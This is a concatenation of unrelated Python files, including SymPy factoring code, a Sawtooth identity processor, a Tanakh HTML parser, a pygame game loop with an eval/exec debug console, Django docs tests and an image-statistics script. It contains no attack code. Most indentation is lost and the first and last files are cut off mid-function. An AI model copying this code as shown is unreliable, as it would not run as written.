for i, a in enumerate(args):
args[i][1] = args[i][1][lenn:]
# find any noncommutative common suffix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_suffix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][-1].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][-1].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
r = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][-1] = args[i][1][-1]*il
break
if not ok:
break
else:
hit = True
lenn = len(n)
r = Mul(*n)
for i, a in enumerate(args):
args[i][1] = a[1][:len(a[1]) - lenn]
if hit:
mid = Add(*[Mul(*cc)*Mul(*nc) for cc, nc in args])
else:
mid = expr
# sort the symbols so the Dummys would appear in the same
# order as the original symbols, otherwise you may introduce
        # a factor of -1, e.g. (A**2 - B**2) -- {A:y, B:x} --> y**2 - x**2
# and the former factors into two terms, (A - B)*(A + B) while the
# latter factors into 3 terms, (-1)*(x - y)*(x + y)
rep1 = [(n, Dummy()) for n in sorted(nc_symbols, key=default_sort_key)]
unrep1 = [(v, k) for k, v in rep1]
unrep1.reverse()
new_mid, r2, _ = _mask_nc(mid.subs(rep1))
new_mid = factor(new_mid)
new_mid = new_mid.subs(r2).subs(unrep1)
if new_mid.is_Pow:
return _keep_coeff(c, g*l*new_mid*r)
if new_mid.is_Mul:
# XXX TODO there should be a way to inspect what order the terms
# must be in and just select the plausible ordering without
# checking permutations
cfac = []
ncfac = []
for f in new_mid.args:
if f.is_commutative:
cfac.append(f)
else:
b, e = f.as_base_exp()
assert e.is_Integer
ncfac.extend([b]*e)
pre_mid = g*Mul(*cfac)*l
target = _mexpand(expr/c)
for s in variations(ncfac, len(ncfac)):
ok = pre_mid*Mul(*s)*r
if _mexpand(ok) == target:
return _keep_coeff(c, ok)
# mid was an Add that didn't factor successfully
return _keep_coeff(c, g*l*mid*r)
|
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import sys
import os
import argparse
import pkg_resources
# Adding the necessary path to PYTHONPATH
path = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(path)
from sawtooth_sdk.processor.core import TransactionProcessor
from sawtooth_sdk.processor.log import init_console_logging
from sawtooth_sdk.processor.log import log_configuration
from sawtooth_sdk.processor.config import get_log_config
from sawtooth_sdk.processor.config import get_log_dir
from sawtooth_sdk.processor.config import get_config_dir
from sawtooth_identity.processor.handler import IdentityTransactionHandler
from sawtooth_identity.processor.config.identity import IdentityConfig
from sawtooth_identity.processor.config.identity import \
load_default_identity_config
from sawtooth_identity.processor.config.identity import \
load_toml_identity_config
from sawtooth_identity.processor.config.identity import \
merge_identity_config
DISTRIBUTION_NAME = 'sawtooth-identity'
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-C', '--connect',
help='Endpoint for the validator connection')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='Increase output sent to stderr')
try:
version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version
except pkg_resources.DistributionNotFound:
version = 'UNKNOWN'
parser.add_argument(
'-V', '--version',
action='version',
version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')
.format(version),
help='print version information')
return parser.parse_args(args)
def load_identity_config(first_config):
default_identity_config = \
load_default_identity_config()
conf_file = os.path.join(get_config_dir(), 'identity.toml')
toml_config = load_toml_identity_config(conf_file)
return merge_identity_config(
configs=[first_config, toml_config, default_identity_config])
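# Note on precedence (an assumption about merge_identity_config, which is not
# shown here): configs earlier in the list take priority, so command-line
# arguments override identity.toml, which overrides the built-in defaults.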
def create_identity_config(args):
return IdentityConfig(connect=args.connect)
def main(args=None):
if args is None:
args = sys.argv[1:]
opts = parse_args(args)
processor = None
try:
print("here 1")
arg_config = create_identity_config(opts)
identity_config = load_identity_config(arg_config)
processor = TransactionProcessor(url=identity_config.connect)
log_config = get_log_config(filename="identity_log_config.toml")
print("here 2")
# If no toml, try loading yaml
if log_config is None:
log_config = get_log_config(filename="identity_log_config.yaml")
if log_config is not None:
log_configuration(log_config=log_config)
else:
log_dir = get_log_dir()
# use the transaction processor zmq identity for filename
log_configuration(
log_dir=log_dir,
name="identity-" + str(processor.zmq_id)[2:-1])
print('here 3')
init_console_logging(verbose_level=opts.verbose)
print('here 4')
handler = IdentityTransactionHandler()
print('here 5')
processor.add_handler(handler)
print('here 6')
processor.start()
print('here 7')
except KeyboardInterrupt:
pass
except Exception as e: # pylint: disable=broad-except
print("Error: {}".format(e))
finally:
if processor is not None:
processor.stop()
if __name__ == "__main__":
main()
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/space/shields/shared_adv_deflector_shields.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
#!/usr/bin/env python
# coding: utf-8
"""Download and parse Tanakh from <http://mechon-mamre.org/>.
The text is based on the [Aleppo Codex][1].
[1]: https://en.wikipedia.org/wiki/Aleppo_Codex
Each book is in a separate HTML file (e.g., `c01.htm`) and contains navigation
and textual data.
The relevant structure is:
```html
<BODY>
<H1>...</H1>
<P>
<B>...,...</B> ...
</P>
</BODY>
```
Notes:
- verses are newline-delimited
- `<H1>` Hebrew book name
- `<B>` comma-separated Hebrew numbering of chapter and verse
- for multipart volumes (e.g., Samuel, Kings) also contains the part number
- `<BIG>`, `<SMALL>`, `<SUP>` around specific letter (we keep)
- `<A...>...</A>` links to notes (we ignore)
- `<BR>` within the text indicates a line break (we replace with a space)
- `{...}<BR>` indicates `pe` break (we ignore)
- `{...}` indicates `samekh` break (we ignore)
- `(...)` indicates the qere (we keep)
- the unvowelized previous word is the ketiv (we ignore)
"""
# native
from functools import partial
from multiprocessing import Queue
from pathlib import Path
from typing import List
import os
import re
# lib
from tqdm import tqdm
# pkg
from . import parse_args, download_unzip, Msg, queuer, spawn_processes, save_database
from .. import tokens as T, grammar
BOOK_NAMES = {
"בראשית": "Genesis",
"שמות": "Exodus",
"ויקרא": "Leviticus",
"במדבר": "Numbers",
"דברים": "Deuteronomy",
#
"יהושוע": "Joshua",
"שופטים": "Judges",
"שמואל א": "I Samuel",
"שמואל ב": "II Samuel",
"מלכים א": "I Kings",
"מלכים ב": "II Kings",
"ישעיהו": "Isaiah",
"ירמיהו": "Jeremiah",
"יחזקאל": "Ezekiel",
"הושע": "Hosea",
"יואל": "Joel",
"עמוס": "Amos",
"עובדיה": "Obadiah",
"יונה": "Jonah",
"מיכה": "Micah",
"נחום": "Nahum",
"חבקוק": "Habakkuk",
"צפניה": "Zephaniah",
"חגיי": "Haggai",
"זכריה": "Zechariah",
"מלאכי": "Malachi",
#
"תהילים": "Psalms",
"משלי": "Proverbs",
"איוב": "Job",
"שיר השירים": "Song of Songs",
"רות": "Ruth",
"איכה": "Lamentations",
"קוהלת": "Ecclesiastes",
"אסתר": "Esther",
"דנייאל": "Daniel",
"עזרא / נחמיה ע": "Ezra",
"עזרא / נחמיה נ": "Nehemiah",
"דברי הימים א": "I Chronicles",
"דברי הימים ב": "II Chronicles",
}
def count_words(lock, pos: int, read_q: Queue, write_q: Queue):
"""Count words in a book."""
# pylint: disable=too-many-locals
tqdm.set_lock(lock)
re_remove = re.compile(
r"</?P>|</?BIG>|</?SMALL>|</?SUP>|<A[^>]+>(.*)</A>|\{.\}|\(|\)"
)
re_name = re.compile(r"<H1>(.*)</H1>")
re_ref = re.compile(r"<B>(.*)</B>")
for msg in queuer(read_q):
result = {"books": [], "words": {}}
book = Path(msg.data)
text = book.read_text()
# book_num = int(book.stem[1:], 10)
book_name = re_name.search(text)[1]
book_num = 0
en_name = ""
# result["books"].append(
# dict(id=book_num, name=book_name, corpus="mechon-mamre.org")
# )
save_ref = ""
desc = f"{os.getpid()} COUNT {book_name:<15}"
for line in tqdm(text.split("\n"), desc=desc, position=pos):
line = re_remove.sub("", line).replace("<BR>", " ").strip()
if save_ref:
ref, save_ref = save_ref, ""
else:
if not line or not line.startswith("<B>"):
continue
ref = re_ref.search(line)[1].replace(" ׆", "")
if "-" in ref:
ref, save_ref = ref.split("-")
save_ref = f'{ref.split(",")[0]},{save_ref}'
ref = f"{book_name} {ref}"
he_name, ref = ref.rsplit(" ", 1)
tmp_name = BOOK_NAMES[he_name]
if tmp_name != en_name:
en_name = tmp_name
book_num = list(BOOK_NAMES).index(he_name) + 1
result["books"].append(
dict(id=book_num, name=en_name, corpus="mechon-mamre.org")
)
chapter, verse = ref.split(",")
chapter, verse = grammar.gematria(chapter), grammar.gematria(verse)
line = re_ref.sub("", line) # reference removed
line = line.replace(T.PUNCTUATION_MAQAF, T.PUNCTUATION_MAQAF + " ")
for raw in line.split():
clean = T.strip(raw)
if not clean:
continue
if clean in result["words"]:
result["words"][clean]["freq"] += 1
else:
ref = f"{en_name} {chapter}:{verse}"
result["words"][clean] = dict(
book_id=book_num, freq=1, ref=ref, raw=raw
)
write_q.put(Msg("SAVE", result))
def list_books(read_q: Queue, folder: Path):
"""Enqueue paths of books to parse."""
for path in sorted(folder.iterdir()):
read_q.put(Msg("COUNT", path))
def main(argv: List[str] = None):
"""Parse texts from <http://mechon-mamre.org>.
Usage: mechon_mamre_org.py [download <folder> | -i <PATH>] [-n COUNT]
Options:
download <folder> download HTML files to <folder>
--index, -i PATH HTML folder [default: text/mechon-mamre.org]
--cpus, -n NUM number of CPUs to use; at least 2 [default: all]
"""
args = parse_args(main.__doc__ or "", argv)
num_readers = args["num_readers"]
num_writers = args["num_writers"]
if args["download"]:
url = "http://mechon-mamre.org/htmlzips/ct005.zip"
folder = Path(args["<folder>"]).resolve()
pattern = re.compile(r"c/ct/c[0-9]{2}.htm")
folder = download_unzip(url, folder, pattern)
else:
folder = Path(args["--index"]).resolve()
init_fn = partial(list_books, folder=folder)
spawn_processes(init_fn, count_words, save_database, num_readers, num_writers)
if __name__ == "__main__": # pragma: no cover
main()
|
##Patterns: R0914: { "max-locals": "3" }
##Warn: R0914
def doEverything(thing):
a = 3
b = 3
c = 3
d = 3
e = 3
f = 3
g = 3
h = 3
i = 3
j = 3
k = 3
l = 3
m = 3
n = 3
o = 3
p = 3
q = 3
r = 3
s = 3
t = 3
|
# Used for testing the new framework
import pygame
import os
import json
import platform
import ctypes
from sysconf import *
pygame.init()
# On Windows, disable display scaling for the game.
# Note: high-DPI users on Windows usually set scaling above 100%, otherwise the text is too small to read.
# For example, on a 1920*1080 screen Windows recommends 125% scaling.
# That would blow the game window up badly, pushing part of the game view below the taskbar.
# Linux does not have this problem, so we only check for Windows here.
if platform.system() == "Windows":
ctypes.windll.user32.SetProcessDPIAware()
# Set the game window size
screen = pygame.display.set_mode([WIDTH, HEIGHT])
# Set the window title
pygame.display.set_caption(TOWER_NAME)
from lib.utools import *
from lib import CurrentMap, PlayerCon, WriteLog
from lib.ground import GroundSurface
from lib import global_var
from lib.event import EventFlow, Event
from project.block import BlockData
RootScreen = GroundSurface(mode="copy", surface=screen)
running = True
from lib import ui
from lib import actions
action_control = actions.ActionControl()
from lib import music
def init():
global_var.set_value("font_name", FONT_NAME)
global_var.set_value("RootScreen", RootScreen)
global_var.set_value("action_control", action_control)
    # Register PlayerCon as a global variable (must be done before CurrentMap.set_map)
global_var.set_value("PlayerCon", PlayerCon)
    # Initialize the map
CurrentMap.set_map(PLAYER_FLOOR)
CurrentMap.add_sprite(PlayerCon)
global_var.set_value("CurrentMap", CurrentMap)
WriteLog.debug(__name__, "初始化地图完成")
# 初始化BlockData(建立通过id反查地图编号的字典)
BlockDataReverse = {}
for map_obj in BlockData:
block_id = BlockData[map_obj]["id"]
BlockDataReverse[block_id] = map_obj
global_var.set_value("BlockDataReverse", BlockDataReverse)
    # Placeholder for the status bar (removing it would shift the in-game map position)
StatusBarArea = RootScreen.add_child("left", BLOCK_UNIT * 4)
StatusBarArea.priority = 15
RootScreen.add_child(CurrentMap)
    # Initialize the UI layers
    # --- UI0 - status bar
    STATUSBAR = ui.StatusBar(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    STATUSBAR.priority = 145
    RootScreen.add_child(STATUSBAR)
    global_var.set_value("STATUSBAR", STATUSBAR)
    WriteLog.debug(__name__, "Status bar layer initialized")
    # --- UI1 - monster handbook
    BOOK = ui.Book(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    BOOK.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(BOOK)
    global_var.set_value("BOOK", BOOK)
    WriteLog.debug(__name__, "Monster handbook layer initialized")
    # --- UI2 - start menu
    STARTMENU = ui.StartMenu(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    STARTMENU.priority = 500 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(STARTMENU)
    global_var.set_value("STARTMENU", STARTMENU)
    WriteLog.debug(__name__, "Start menu layer initialized")
    # --- UI3 - backpack
    BACKPACK = ui.Backpack(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    BACKPACK.priority = 150 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(BACKPACK)
    global_var.set_value("BACKPACK", BACKPACK)
    WriteLog.debug(__name__, "Backpack layer initialized")
    # --- UI4 - save menu
    SAVE = ui.SaveMenu(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    SAVE.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(SAVE)
    global_var.set_value("SAVE", SAVE)
    WriteLog.debug(__name__, "Save menu layer initialized")
    # --- UI5 - load menu
    LOAD = ui.LoadMenu(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    LOAD.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(LOAD)
    global_var.set_value("LOAD", LOAD)
    WriteLog.debug(__name__, "Load menu layer initialized")
    # --- UI6 - floor teleporter
    FLY = ui.Fly(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    FLY.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(FLY)
    global_var.set_value("FLY", FLY)
    WriteLog.debug(__name__, "Floor teleporter layer initialized")
    # --- UI7 - help screen
    HELP = ui.Help(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    HELP.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(HELP)
    global_var.set_value("HELP", HELP)
    WriteLog.debug(__name__, "Help layer initialized")
    # --- UI8 - shop 1
    Shop1 = ui.Shop1(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    Shop1.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(Shop1)
    global_var.set_value("Shop1", Shop1)
    WriteLog.debug(__name__, "Shop 1 layer initialized")
    # --- UI9 - shop 2
    Shop2 = ui.Shop2(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    Shop2.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(Shop2)
    global_var.set_value("Shop2", Shop2)
    WriteLog.debug(__name__, "Shop 2 layer initialized")
    # --- UI10 - text box
    TEXTBOX = ui.TextBox(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    TEXTBOX.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(TEXTBOX)
    global_var.set_value("TEXTBOX", TEXTBOX)
    WriteLog.debug(__name__, "Text box layer initialized")
    # --- UI11 - choice box
    CHOICEBOX = ui.ChoiceBox(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    CHOICEBOX.priority = 140 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(CHOICEBOX)
    global_var.set_value("CHOICEBOX", CHOICEBOX)
    WriteLog.debug(__name__, "Choice box layer initialized")
    # --- UI12 - damage display layer
    SHOWDAMAGE = ui.ShowDamage(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    SHOWDAMAGE.priority = 65 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(SHOWDAMAGE)
    global_var.set_value("SHOWDAMAGE", SHOWDAMAGE)
    WriteLog.debug(__name__, "Damage display layer initialized")
    # --- UI13 - screen tint layer
    CURTAIN = ui.Curtain(mode='copy', surface=RootScreen) # must be initialized the same way as a GroundSurface
    CURTAIN.priority = 125 # render priority; higher than the map, so drawn above it
    RootScreen.add_child(CURTAIN)
    global_var.set_value("CURTAIN", CURTAIN)
    WriteLog.debug(__name__, "Screen tint layer initialized")
    WriteLog.info(__name__, "All UI layers initialized")
def init_actions():
# QUIT:
def quit(e):
global running
running = False
return True
    # Register the events
action_control.register_action('QUIT', pygame.QUIT, quit)
action_control.register_action('BOOK', pygame.KEYUP, global_var.get_value('BOOK').action)
action_control.register_action('STARTMENU', pygame.KEYUP, global_var.get_value('STARTMENU').action)
action_control.register_action('BACKPACK', pygame.KEYUP, global_var.get_value('BACKPACK').action)
action_control.register_action('SAVE', pygame.KEYUP, global_var.get_value('SAVE').action)
action_control.register_action('LOAD', pygame.KEYUP, global_var.get_value('LOAD').action)
action_control.register_action('FLY', pygame.KEYUP, global_var.get_value('FLY').action)
action_control.register_action('HELP', pygame.KEYUP, global_var.get_value('HELP').action)
action_control.register_action('Shop1', pygame.KEYUP, global_var.get_value('Shop1').action)
action_control.register_action('Shop2', pygame.KEYUP, global_var.get_value('Shop2').action)
action_control.register_action('TEXTBOX', pygame.KEYUP, global_var.get_value('TEXTBOX').action)
action_control.register_action('CHOICEBOX', pygame.KEYUP, global_var.get_value('CHOICEBOX').action)
action_control.register_action('SHOWDAMAGE', pygame.KEYUP, global_var.get_value('SHOWDAMAGE').action)
action_control.register_action('STATUSBAR', pygame.KEYUP, global_var.get_value('STATUSBAR').action)
action_control.register_action('CURTAIN', pygame.KEYUP, global_var.get_value('CURTAIN').action)
WriteLog.info(__name__, "事件全部注册完成")
def init_sound():
Music = music.MusicWrapper()
global_var.set_value("Music", Music)
WriteLog.info(__name__, "初始化音效完成")
def init_event_flow():
EVENTFLOW = EventFlow()
global_var.set_value("EVENTFLOW", EVENTFLOW)
EVENT = Event()
global_var.set_value("EVENT", EVENT)
EVENT.get_event_flow_module()
EVENTFLOW.get_event_module()
WriteLog.info(__name__, "初始化事件流完成")
def init_function():
FUNCTION = global_var.get_value("FUNCTION")
FUNCTION.init_var()
WriteLog.info(__name__, "初始化function完成")
# DEBUG(开关在sysconf.py,如果开启将会启动控制台)
if DEBUG:
import threading
def console():
while running:
r = input()
try:
print(eval(r))
except:
try:
exec(r)
except Exception as e:
print("error:", str(e))
t = threading.Thread(target=console)
t.start()
init()
init_actions()
init_sound()
init_event_flow()
init_function()
clock = pygame.time.Clock()
STARTMENU = global_var.get_value("STARTMENU")
# Main program
while running:
# a = pygame.time.get_ticks()
    # Show the start menu
if STARTMENU.new_game == True:
STARTMENU.open()
STARTMENU.new_game = False
        # Damage display is enabled by default
show_damage = global_var.get_value("SHOWDAMAGE")
show_damage.open()
        # The status bar is enabled by default
status_bar = global_var.get_value("STATUSBAR")
status_bar.open()
        # Make sure the map is in the active state
CurrentMap.active = True
        # Load the initial events
EVENTFLOW = global_var.get_value("EVENTFLOW")
with open(os.path.join(os.getcwd(),"project", "start_text.json")) as f:
start_text = json.load(f)
EVENTFLOW.insert_action(start_text["startText"])
pygame.display.update()
    # Background
    RootScreen.flush(screen) # flush the display to the screen
    action_control.action_render() # check for action messages
# b = pygame.time.get_ticks()
# print(b - a)
|
import datetime
import os
from http import HTTPStatus
from operator import attrgetter
from pathlib import Path
from django.conf import settings
from django.contrib.sites.models import Site
from django.template import Context, Template
from django.test import TestCase
from django.urls import reverse, set_urlconf
from djangoproject.urls import www as www_urls
from releases.models import Release
from .models import Document, DocumentRelease
from .sitemaps import DocsSitemap
from .utils import get_doc_path
class ModelsTests(TestCase):
def test_dev_is_supported(self):
"""
Document for a release without a date ("dev") is supported.
"""
d = DocumentRelease.objects.create()
self.assertTrue(d.is_supported)
self.assertTrue(d.is_dev)
def test_current_is_supported(self):
"""
Document with a release without an EOL date is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_previous_is_supported(self):
"""
Document with a release with an EOL date in the future is supported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 5 * day,
eol_date=today + 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
def test_old_is_unsupported(self):
"""
Document with a release with an EOL date in the past is unsupported.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day,
eol_date=today - 5 * day)
d = DocumentRelease.objects.create(release=r)
self.assertFalse(d.is_supported)
self.assertFalse(d.is_dev)
def test_most_recent_micro_release_considered(self):
"""
Dates are looked up on the latest micro release in a given series.
"""
today = datetime.date.today()
day = datetime.timedelta(1)
r = Release.objects.create(version='1.8',
date=today - 15 * day)
d = DocumentRelease.objects.create(release=r)
r2 = Release.objects.create(version='1.8.1',
date=today - 5 * day)
# The EOL date of the first release is set automatically.
r.refresh_from_db()
self.assertEqual(r.eol_date, r2.date)
# Since 1.8.1 is still supported, docs show up as supported.
self.assertTrue(d.is_supported)
self.assertFalse(d.is_dev)
class ManagerTests(TestCase):
@classmethod
def setUpTestData(cls):
r1 = Release.objects.create(version='1.0')
r2 = Release.objects.create(version='2.0')
DocumentRelease.objects.bulk_create(
DocumentRelease(lang=lang, release=release)
for lang, release in [('en', r1), ('en', r2), ('sv', r1), ('ar', r1)]
)
def test_by_version(self):
doc_releases = DocumentRelease.objects.by_version('1.0')
self.assertEqual(
{(r.lang, r.release.version) for r in doc_releases},
{('en', '1.0'), ('sv', '1.0'), ('ar', '1.0')}
)
def test_get_by_version_and_lang_exists(self):
doc = DocumentRelease.objects.get_by_version_and_lang('1.0', 'en')
self.assertEqual(doc.release.version, '1.0')
self.assertEqual(doc.lang, 'en')
def test_get_by_version_and_lang_missing(self):
with self.assertRaises(DocumentRelease.DoesNotExist):
DocumentRelease.objects.get_by_version_and_lang('2.0', 'sv')
def test_get_available_languages_by_version(self):
get = DocumentRelease.objects.get_available_languages_by_version
self.assertEqual(list(get('1.0')), ['ar', 'en', 'sv'])
self.assertEqual(list(get('2.0')), ['en'])
self.assertEqual(list(get('3.0')), [])
class RedirectsTests(TestCase):
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_team_url(self):
# This URL is linked from the docs.
self.assertEqual('/foundation/teams/', reverse('members:teams', urlconf=www_urls))
def test_internals_team(self):
response = self.client.get(
'/en/dev/internals/team/',
HTTP_HOST='docs.djangoproject.dev:8000',
)
self.assertRedirects(
response,
'https://www.djangoproject.com/foundation/teams/',
status_code=HTTPStatus.MOVED_PERMANENTLY,
fetch_redirect_response=False,
)
class SearchFormTestCase(TestCase):
fixtures = ['doc_test_fixtures']
def setUp(self):
# We need to create an extra Site because docs have SITE_ID=2
Site.objects.create(name='Django test', domain="example2.com")
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_empty_get(self):
response = self.client.get('/en/dev/search/',
HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 200)
class TemplateTagTests(TestCase):
def test_pygments_template_tag(self):
template = Template('''
{% load docs %}
{% pygment 'python' %}
def band_listing(request):
"""A view of all bands."""
bands = models.Band.objects.all()
return render(request, 'bands/band_listing.html', {'bands': bands})
{% endpygment %}
''')
self.assertHTMLEqual(
template.render(Context()),
"""
<div class="highlight">
<pre>
<span></span>
<span class="k">def</span><span class="nf">band_listing</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">):</span>
<span class="sd">"""A view of all bands."""</span>
<span class="n">bands</span> <span class="o">=</span>
<span class="n">models</span><span class="o">.</span>
<span class="n">Band</span><span class="o">.</span>
<span class="n">objects</span><span class="o">.</span>
<span class="n">all</span><span class="p">()</span>
<span class="k">return</span> <span class="n">render</span>
<span class="p">(</span><span class="n">request</span>
<span class="p">,</span>
<span class="s1">'bands/band_listing.html'</span>
<span class="p">,</span> <span class="p">{</span>
<span class="s1">'bands'</span><span class="p">:</span>
<span class="n">bands</span><span class="p">})</span>
</pre>
</div>
"""
)
class TestUtils(TestCase):
def test_get_doc_path(self):
# non-existent file
self.assertEqual(get_doc_path(Path('root'), 'subpath.txt'), None)
# existing file
path, filename = __file__.rsplit(os.path.sep, 1)
self.assertEqual(get_doc_path(Path(path), filename), None)
class UpdateDocTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.release = DocumentRelease.objects.create()
def test_sync_to_db(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_clean_path(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the title',
'current_page_name': 'foo/bar/index',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['<Document: en/dev/foo/bar>'])
def test_title_strip_tags(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'This is the <strong>title</strong>',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['This is the title'], transform=attrgetter('title'))
def test_title_entities(self):
self.release.sync_to_db([{
'body': 'This is the body',
'title': 'Title & title',
'current_page_name': 'foo/bar',
}])
self.assertQuerysetEqual(self.release.documents.all(), ['Title & title'], transform=attrgetter('title'))
def test_empty_documents(self):
self.release.sync_to_db([
{'title': 'Empty body document', 'current_page_name': 'foo/1'},
{'body': 'Empty title document', 'current_page_name': 'foo/2'},
{'current_page_name': 'foo/3'},
])
self.assertQuerysetEqual(self.release.documents.all(), [])
def test_excluded_documents(self):
"""
Documents aren't created for partially translated documents excluded
from robots indexing.
"""
# Read the first Disallow line of robots.txt.
robots_path = settings.BASE_DIR.joinpath('djangoproject', 'static', 'robots.docs.txt')
with open(str(robots_path), 'r') as fh:
for line in fh:
if line.startswith("Disallow:"):
break
_, lang, version, path = line.strip().split('/')
release = DocumentRelease.objects.create(
lang=lang, release=Release.objects.create(version=version),
)
release.sync_to_db([
{'body': '', 'title': '', 'current_page_name': 'nonexcluded/bar'},
{'body': '', 'title': '', 'current_page_name': '%s/bar' % path},
])
self.assertQuerysetEqual(
release.documents.all(),
['<Document: %s/%s/nonexcluded/bar>' % (lang, version)]
)
class SitemapTests(TestCase):
fixtures = ['doc_test_fixtures']
@classmethod
def tearDownClass(cls):
# cleanup URLconfs changed by django-hosts
set_urlconf(None)
super().tearDownClass()
def test_sitemap_index(self):
response = self.client.get('/sitemap.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertContains(response, '<sitemap>', count=2)
self.assertContains(response, '<loc>http://docs.djangoproject.dev:8000/sitemap-en.xml</loc>')
def test_sitemap(self):
doc_release = DocumentRelease.objects.create()
document = Document.objects.create(release=doc_release)
sitemap = DocsSitemap('en')
urls = sitemap.get_urls()
self.assertEqual(len(urls), 1)
url_info = urls[0]
self.assertEqual(url_info['location'], document.get_absolute_url())
def test_sitemap_404(self):
response = self.client.get('/sitemap-xx.xml', HTTP_HOST='docs.djangoproject.dev:8000')
self.assertEqual(response.status_code, 404)
self.assertEqual(
response.context['exception'],
"No sitemap available for section: 'xx'"
)
|
import numpy as np
import cv2
import os
mean = []
std = []
img_list = []
dir_path = './STL10-data/train'
class_paths = os.listdir(dir_path)
print(class_paths)
for cls in class_paths:
img_paths = os.listdir(dir_path + os.sep + cls)
print(len(img_paths))
for img_path in img_paths:
print(img_path)
img_path = dir_path + os.sep + cls + os.sep + img_path
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
img = img[:, :, :, np.newaxis]  # add a sample axis so images can be stacked along axis 3
img_list.append(img)
# dir_path = './STL10-data/test'
# class_paths = os.listdir(dir_path)
# print(class_paths)
# for cls in class_paths:
# img_paths = os.listdir(dir_path + os.sep + cls)
# print(len(img_paths))
# for img_path in img_paths:
# print(img_path)
# img_path = dir_path + os.sep + cls + os.sep + img_path
# img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# img = img[::, np.newaxis]
# img_list.append(img)
imgs = np.concatenate(img_list, axis=3)
imgs = imgs.astype(np.float32) / 255.0
for i in range(3):
channel = imgs[:, :, i, :].ravel()
mean.append(np.mean(channel))
std.append(np.std(channel))
mean.reverse()
std.reverse()
print(mean)
print(std)
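# Note (added sketch, not part of the original script): cv2.imread returns
# channels in BGR order, so the reverse() calls above flip the per-channel
# statistics into RGB order before printing. A typical downstream use of the
# printed values would be something like torchvision.transforms.Normalize(mean, std);
# that usage is an assumption here, since this script only computes and prints them.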
|
# qubit number=4
# total number=31
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += X(3) # number=1
